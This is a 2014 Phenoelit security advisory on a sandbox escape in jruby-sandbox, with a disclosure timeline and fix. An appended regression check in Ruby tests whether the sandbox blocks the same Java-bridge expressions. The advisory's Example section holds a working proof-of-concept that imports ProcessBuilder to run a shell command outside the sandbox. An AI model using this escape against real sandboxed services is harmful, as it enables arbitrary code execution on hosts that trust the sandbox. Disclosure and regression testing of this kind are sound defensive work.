Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 +-+++>

[ Authors ]
    joernchen <joernchen () phenoelit de>

    Phenoelit Group (http://www.phenoelit.de)

[ Affected Products ]
    jruby-sandbox <= 0.2.2
    https://github.com/omghax/jruby-sandbox

[ Vendor communication ]
    2014-04-22 Sent vulnerability details to project maintainer
    2014-04-24 Requested confirmation that details were received
    2014-04-24 Maintainer states he is working on a test case
    2014-04-24 Maintainer releases fixed version
    2014-04-24 Release of this advisory

[ Description ]
    jruby-sandbox aims to allow safe execution of user-supplied Ruby code
    within a JRuby [0] runtime. However, by importing Java classes it is
    possible to circumvent those protections and execute arbitrary code
    outside the sandboxed environment.

[ Example ]
    require 'sandbox'
    sand = Sandbox.safe
    sand.activate!
    begin
      sand.eval("print `id`")
    rescue Exception => e
      puts "fail via Ruby ;)"
    end
    puts "Now for some Java"
    sand.eval("Kernel.send :java_import, 'java.lang.ProcessBuilder'")
    sand.eval("Kernel.send :java_import, 'java.util.Scanner'")
    sand.eval("s = Java::java.util.Scanner.new( " +
              "Java::java.lang.ProcessBuilder.new('sh','-c','id')" +
              ".start.getInputStream).useDelimiter(\"\x00\").next")
    sand.eval("print s")

[ Solution ]
    Upgrade to version 0.2.3

[ References ]
    [0] http://jruby.org/

[ end of file ]
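Appended after the advisory as an added regression check (not part of the advisory and not code from the jruby-sandbox project): it evaluates the Java-bridge expressions from the Example section inside a sandbox and reports any that the sandbox lets through, which is the kind of test case a maintainer would keep to confirm the 0.2.3 fix holds. It assumes only that the sandbox object responds to eval(String), as Sandbox.safe does; the Sandbox constant is used only when the gem loads under JRuby.

```ruby
# Added example, not from the advisory or the jruby-sandbox project.
begin
  require 'sandbox'   # jruby-sandbox gem; only loadable under JRuby
rescue LoadError
  # Not under JRuby: the helpers below still work with any eval-capable sandbox.
end

# Probe snippets taken from the advisory's Example section. Each one must
# raise inside a correctly confined sandbox; if any evaluates without error,
# the Java bridge is reachable from user-supplied code.
JAVA_PROBES = [
  "Kernel.send :java_import, 'java.lang.ProcessBuilder'",
  "Java::java.lang.ProcessBuilder",
  "Java::java.util.Scanner",
].freeze

# Returns the probes the sandbox evaluated successfully (empty == confined).
def leaked_java_probes(sand, probes = JAVA_PROBES)
  probes.select do |src|
    begin
      sand.eval(src)
      true            # no exception: the probe ran, which is a leak
    rescue Exception  # the sandbox refused it, as expected
      false
    end
  end
end

# True only when every probe is rejected by the sandbox.
def sandbox_blocks_java?(sand, probes = JAVA_PROBES)
  leaked_java_probes(sand, probes).empty?
end

# Stand-alone run against a real jruby-sandbox instance (JRuby only).
if __FILE__ == $0 && defined?(Sandbox)
  sand = Sandbox.safe
  sand.activate!
  leaked = leaked_java_probes(sand)
  if leaked.empty?
    puts "OK: Java bridge not reachable from sandboxed code"
  else
    puts "VULNERABLE: sandbox evaluated #{leaked.inspect}"
  end
end
```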